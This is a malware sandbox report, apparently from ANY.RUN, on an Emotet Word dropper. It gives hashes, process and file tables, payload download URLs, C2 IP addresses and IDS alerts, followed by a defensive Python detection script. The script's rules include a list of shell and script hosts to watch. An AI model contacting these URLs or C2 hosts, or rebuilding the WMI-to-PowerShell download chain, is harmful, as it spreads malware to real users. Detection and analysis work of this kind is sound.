| Field | Value |
|---|---|
| File name | 2020-16-10-9198856.doc |
| Full analysis | https://app.any.run/tasks/cf801303-d03d-48c0-b4da-c6f8c5700409 |
| Verdict | Malicious activity |
| Threats | Emotet: a modular trojan that started as a banking trojan and evolved into a loader for other malware. It is distributed in mass spam campaigns carrying macro-enabled Office attachments; corporate networks are the main target, but private users are infected by the same campaigns. |
| Analysis date | October 19, 2020, 20:34:51 |
| OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit) |
| Tags | |
| Indicators | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Et., Author: Evan Jean, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Oct 15 23:22:00 2020, Last Saved Time/Date: Thu Oct 15 23:22:00 2020, Number of Pages: 1, Number of Words: 3715, Number of Characters: 21176, Security: 8 |
| MD5 | AE1F589EADD2BE17832BC0BD2FE3134A |
| SHA1 | 6A7941D9AC2F33E1D2D4DA29A1D7330FE715817C |
| SHA256 | C97612FA3E5F2AAC90D806B99BAD47C67F42D3A636CB9702F06CF11DE4F3A310 |
| SSDEEP | 3072:uBeY5kb0TUNAuBqVPlB11nBMxeOWdFllOBRhwg:uEYOb0TUquBqt7nB+5WkRhwg |
| Extension | File type | Score |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| LocaleIndicator | 1033 |
| CodePage | Unicode UTF-16, little endian |
| HeadingPairs | |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 15 |
| CharCountWithSpaces | 24842 |
| Paragraphs | 49 |
| Lines | 176 |
| Company | - |
| Security | Locked for annotations |
| Characters | 21176 |
| Words | 3715 |
| Pages | 1 |
| ModifyDate | 2020:10:15 22:22:00 |
| CreateDate | 2020:10:15 22:22:00 |
| TotalEditTime | - |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | - |
| Template | Normal.dotm |
| Comments | - |
| Keywords | - |
| Author | Evan Jean |
| Subject | - |
| Title | Et. |
| PID | Command line | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2020-16-10-9198856.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 2672 | POwersheLL -ENCOD [base64-encoded command elided] | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255); Exit code: 0 |
| 2164 | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | — | wmiprvse.exe | User: admin; Company: Steffen Lange; Integrity level: MEDIUM; Description: Password Changer; Version: 1.0.0.1; Exit code: 0 |
| 3628 | "C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe" | C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe | — | Qlrf9ve.exe | User: admin; Company: Steffen Lange; Integrity level: MEDIUM; Description: Password Changer; Version: 1.0.0.1 |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3CA3.tmp.cvr | — | — | — |
| 2672 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1SHA6ZV8C2JC6C741F3E.temp | — | — | — |
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | FB662A8D89AB2DB7BE0BDA0159E1637E | B36982C25204FA08F5BECFC55BC5E5786AD3E54B69658F3A4A112CC5AA04A452 |
| 2672 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | F17FB243611FC8D2B382ABB444B83A98 | B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 |
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 31C6FDB776B17A8C6494B66F92506AA2 | 13864DE11C8D201328FF2DD83315FC3DDC526696F884A2515CD7D51DBD17C3C0 |
| 2164 | Qlrf9ve.exe | C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe | executable | 9F1E91C3FAF940E244B27E2E06DAC739 | 64DDE4FD3D4323F431A117D893AA75278EF8A988968747671F135E3C6B851158 |
| 2672 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1249c3.TMP | binary | F17FB243611FC8D2B382ABB444B83A98 | B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 |
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$20-16-10-9198856.doc | pgc | C6A1A22EA13AF8A9758F0B93F1EED213 | 77386DF4C30A7DC386B3F958463113A3C3FE5FEBE33E019AC0A51AC54FCAF244 |
| 2672 | POwersheLL.exe | C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe | executable | 9F1E91C3FAF940E244B27E2E06DAC739 | 64DDE4FD3D4323F431A117D893AA75278EF8A988968747671F135E3C6B851158 |
| PID | Process | Method | HTTP code | IP | URL | Country | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 2672 | POwersheLL.exe | GET | 200 | 69.65.3.197:80 | http://methilinfotech.com/maliga/OFbr/ | US | executable | 361 KB | suspicious |
| 2672 | POwersheLL.exe | GET | 404 | 107.180.51.103:80 | http://thedibbsapp.com/backup-14-10-2020/yBV/ | US | html | 18.2 KB | malicious |
| 2672 | POwersheLL.exe | GET | — | 72.167.191.65:80 | http://p3nlhclust404.shr.prod.phx3.secureserver.net/SharedContent/redirect_0.html | US | — | — | unknown |
| 2672 | POwersheLL.exe | GET | 302 | 160.153.138.219:80 | http://www.consultmyadvo.com/content/Jr6/ | US | html | 265 B | malicious |
| 3628 | IPBusEnumProxy.exe | POST | — | 208.180.207.205:80 | http://208.180.207.205/5tMqdIvMrmlmEvfV/ | US | — | — | malicious |
| 2672 | POwersheLL.exe | GET | 404 | 173.212.251.233:80 | http://cesurlarsearay.com/wp-admin/RuMpdND/ | DE | html | 315 B | unknown |
| 3628 | IPBusEnumProxy.exe | POST | 200 | 167.114.153.111:8080 | http://167.114.153.111:8080/GvXXVjXieWrr9Ju/FfaAxcs0DNFVG53mg9p/CfpG4LaolRjYSKc/oQLS7evNzVRcI0JC/eIRYIVI65otjp3mp/aMTAR36DZxxnw/ | CA | binary | 132 B | malicious |
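Read together, the process, dropped-file and HTTP tables show the usual Emotet maldoc chain: the document launches PowerShell through WMI, so the shell's parent is wmiprvse.exe rather than WINWORD.EXE; the case-mangled `POwersheLL -ENCOD` downloader requests several compromised sites, one of which (methilinfotech.com) returns a 361 KB executable; that file is written to a random path under the user profile, copies itself (same MD5/SHA256) into a directory named after a Windows component (`AppData\Local\kernel32`), and the copy beacons by POST to bare IP addresses on ports 80 and 8080. The detection pass below is an added example, not ANY.RUN output or Emotet code. The event records are hand-copied from the tables above into Python dicts; the parent image paths are assumed (the report lists only the parent's file name), the encoded PowerShell argument is a placeholder because the page elides it, and the rule names and the SHELLS and FAKE_SYSTEM_DIRS lists are my own illustrative choices.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed telemetry copied from the report's tables. Parent image paths are
# assumed (the report names only the parent executable) and the -ENCOD argument
# is a placeholder ("ABC" as UTF-16LE base64) because the page elides the real one.
PROCESSES = [
    {"pid": 544, "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                r'"C:\Users\admin\AppData\Local\Temp\2020-16-10-9198856.doc"'},
    {"pid": 2672, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe",
     "parent": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "cmdline": "POwersheLL -ENCOD QQBCAEMA"},
    {"pid": 2164, "image": r"C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe",
     "parent": r"C:\Windows\System32\wbem\wmiprvse.exe",
     "cmdline": r"C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe"},
    {"pid": 3628, "image": r"C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe",
     "parent": r"C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe",
     "cmdline": r'"C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe"'},
]
FILE_WRITES = [
    {"pid": 544, "path": r"C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd", "type": "tlb"},
    {"pid": 2672, "path": r"C:\Users\admin\Cu3dpvb\D74a8qu\Qlrf9ve.exe", "type": "executable"},
    {"pid": 2164, "path": r"C:\Users\admin\AppData\Local\kernel32\IPBusEnumProxy.exe", "type": "executable"},
]
HTTP = [
    {"pid": 2672, "method": "GET", "code": 200, "url": "http://methilinfotech.com/maliga/OFbr/", "type": "executable"},
    {"pid": 2672, "method": "GET", "code": 404, "url": "http://thedibbsapp.com/backup-14-10-2020/yBV/", "type": "html"},
    {"pid": 2672, "method": "GET", "code": 302, "url": "http://www.consultmyadvo.com/content/Jr6/", "type": "html"},
    {"pid": 3628, "method": "POST", "code": None, "url": "http://208.180.207.205/5tMqdIvMrmlmEvfV/", "type": None},
    {"pid": 3628, "method": "POST", "code": 200, "url": "http://167.114.153.111:8080/GvXXVjXieWrr9Ju/", "type": "binary"},
]

# Illustrative lists, not exhaustive: script hosts worth watching under WMI, and
# directory names that imitate Windows components when they appear under C:\Users.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
          "mshta.exe", "rundll32.exe", "regsvr32.exe"}
FAKE_SYSTEM_DIRS = {"kernel32", "ntdll", "user32", "system32", "syswow64", "wbem"}
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1]


def is_encoded_flag(token):
    """powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -en,
    -ENCOD, ...) plus the -ec alias. Compare case-insensitively so mangled casing
    such as 'POwersheLL -ENCOD' does not slip past a literal '-EncodedCommand' match."""
    if not token.startswith("-"):
        return False
    t = token[1:].lower()
    return t == "ec" or (t.startswith("e") and "encodedcommand".startswith(t))


def path_flags(path):
    """'user_profile' if the path is under C:\\Users; additionally 'fake_system_dir'
    if one of its directories is named after a Windows component (AppData\\Local\\kernel32)."""
    parts = path.lower().replace("/", "\\").split("\\")
    flags = set()
    if parts[:2] == ["c:", "users"]:
        flags.add("user_profile")
        if any(p in FAKE_SYSTEM_DIRS for p in parts[2:-1]):
            flags.add("fake_system_dir")
    return flags


def detect(processes, file_writes, http):
    """Return {pid: sorted rule names} for every process that tripped a rule."""
    hits = defaultdict(set)
    images = {p["pid"]: basename(p["image"]).lower() for p in processes}
    for p in processes:
        img, parent = basename(p["image"]), basename(p["parent"]).lower()
        flags = path_flags(p["image"])
        # T1047: the Office macro created the child via WMI, so WmiPrvSE is the parent.
        if parent == "wmiprvse.exe" and (img.lower() in SHELLS or "user_profile" in flags):
            hits[p["pid"]].add("wmi_spawned")
        if img.lower() == "powershell.exe":
            if img != "powershell.exe":           # on-disk name is lowercase; mixed case is an evasion tell
                hits[p["pid"]].add("case_mangled_powershell")
            if any(is_encoded_flag(tok) for tok in p["cmdline"].split()):
                hits[p["pid"]].add("encoded_command")
        if "user_profile" in flags and img.lower().endswith(".exe"):
            hits[p["pid"]].add("exe_from_user_profile")
        if "fake_system_dir" in flags:
            hits[p["pid"]].add("fake_system_dir")
    for f in file_writes:
        flags = path_flags(f["path"])
        if f["type"] == "executable" and "user_profile" in flags:
            hits[f["pid"]].add("pe_dropped_in_profile")
        if "fake_system_dir" in flags:
            hits[f["pid"]].add("fake_system_dir")
    for r in http:
        host = urlparse(r["url"]).hostname or ""
        if r["method"] == "GET" and r.get("type") == "executable" and images.get(r["pid"]) in SHELLS:
            hits[r["pid"]].add("scripted_pe_download")   # a script host fetched a PE over plain HTTP
        if r["method"] == "POST" and IPV4.match(host):
            hits[r["pid"]].add("post_to_bare_ip")        # beacon to a raw IP, no hostname involved
    return {pid: sorted(rules) for pid, rules in hits.items()}


if __name__ == "__main__":
    for pid, rules in sorted(detect(PROCESSES, FILE_WRITES, HTTP).items()):
        print(pid, ", ".join(rules))
```

Run as-is it reports nothing for WINWORD.EXE (PID 544) and flags the three later stages on different rules, which is the point: none of the rules depends on the document hash, the download URLs or the C2 addresses, all of which rotate between Emotet campaigns, whereas the WMI parent, the abbreviated `-e` family of switches, the profile-resident executable and the POST to a raw IP are structural to the chain. In a real pipeline the same checks would run over Sysmon event IDs 1, 11 and 3 (or a proxy log) instead of the hand-copied dicts.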
| PID | Process | IP | Domain | ASN | Country | Reputation |
|---|---|---|---|---|---|---|
| 3628 | IPBusEnumProxy.exe | 208.180.207.205:80 | — | Suddenlink Communications | US | malicious |
| 2672 | POwersheLL.exe | 107.180.51.103:80 | thedibbsapp.com | GoDaddy.com, LLC | US | malicious |
| 3628 | IPBusEnumProxy.exe | 167.114.153.111:8080 | — | OVH SAS | CA | malicious |
| 2672 | POwersheLL.exe | 69.65.3.197:80 | methilinfotech.com | GigeNET | US | suspicious |
| 2672 | POwersheLL.exe | 43.255.154.57:80 | jashmusic.com | GoDaddy.com, LLC | SG | malicious |
| 2672 | POwersheLL.exe | 72.167.191.65:80 | p3nlhclust404.shr.prod.phx3.secureserver.net | GoDaddy.com, LLC | US | unknown |
| 2672 | POwersheLL.exe | 173.212.251.233:80 | cesurlarsearay.com | Contabo GmbH | DE | unknown |
| 2672 | POwersheLL.exe | 160.153.138.219:80 | www.consultmyadvo.com | GoDaddy.com, LLC | US | malicious |
| Domain | IP | Reputation |
|---|---|---|
| jashmusic.com | — | malicious |
| www.consultmyadvo.com | — | malicious |
| p3nlhclust404.shr.prod.phx3.secureserver.net | — | unknown |
| thedibbsapp.com | — | unknown |
| cesurlarsearay.com | — | unknown |
| methilinfotech.com | — | suspicious |
PID | Process | Class | Message |
---|---|---|---|
2672 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2672 | POwersheLL.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2672 | POwersheLL.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2672 | POwersheLL.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2672 | POwersheLL.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3628 | IPBusEnumProxy.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |
3628 | IPBusEnumProxy.exe | A Network Trojan was detected | MALWARE [PTsecurity] Emotet |